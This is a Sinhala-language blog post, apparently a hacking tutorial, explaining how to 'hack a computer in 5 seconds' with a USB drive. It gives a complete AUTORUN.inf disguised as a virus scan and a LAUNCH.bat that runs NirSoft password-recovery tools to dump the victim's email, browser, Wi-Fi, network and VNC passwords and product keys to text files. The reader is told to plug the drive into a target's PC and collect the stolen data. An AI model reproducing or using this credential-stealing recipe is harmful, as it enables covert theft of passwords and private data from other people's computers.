~••තත්පර 5 කින් computer එකක් hack කරමු••~

Hey ! යාළුවනේ මන් අද ඔයාලට අරගෙන ආවෙ තත්පර 5 ක් ඇතුලත Computer එකක් hack කරන විදියක් ගැන.
මේක හරිම simple එකක් හැබැයි simple කිව්වට simple ම නෑ….
අපි එහෙනන් වැඩෙට බහිමු.
1).මුලින්ම Note pade එකේ මෙ code එක copy/past කරන්න.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

දැන් ඔයාට කැමති foder එකක AUTORUN.inf විදියට save කරන්න.
2)නැවතත් Note pad එක අරගෙන මේ code ට්ක copy/past කරන්න.

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt

දැන අර කලින් folder එකටම LAUNCH.bat ලෙස save කරන්න.
3)ඒ වැඩේ හරිනන් දැන් මේ link එකට යන්න http://www.nirsoft.net/
.ගිහිල්ල මේකෙ තියෙන tool සියල්ලම download කරගන්න
4)ඔයාගෙ pen එක pc එකට connect කරන්න.ඊට පස්සෙ අර ඩවුන්ලොඩ් කරගත්ත file ටික extract කරල කලින් save කරගත්ත LAUNCH.bat, AUTORUN.inf දෙකත් එක්ක ඔක්කොම ඔයාගෙ pen එකට copy කරන්න
5)දැන් pen එක ගලවන් ගිහිල්ල ඔයාට hack කරන්න ඔන කෙනාගෙ pc එකට pen එක ගහල තත්පර පහක් විතර බලන් ඉන්න.ඔයාට මොනයම් හේතුවක් උඩ pc එක hack උනේ නෑ කියලා හිතුනොත් පෙන් එකේ තියෙන LAUNCH.bat කියෙන bat file එක run කරල පෙන් එක ගලවන්න.
6)ඔන්න එහෙනන් වැඩේ ගොඩ.දැන ඔයගෙ pc එකට පෙන් එක connect කරන්න.එතකොට ඔයාට පෙනෙයි txt file වගයක් ඒව open කරල බලන්න එතකොට ඔයාට පෙනෙයි.
එයාගෙ..
Network password
Chrome history වගේ ගොඩක් වැදගත් දේවල්
එහෙනන් ඔන්න යාළුවනේ මගෙ වැඩෙ ඉවරයි.මෙක කියවපු ඔයාල coment එකක් දාල යන්න අමතක කරන්න එපා හොදේ.....


Share on Google Plus

About Rajika Keminda

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment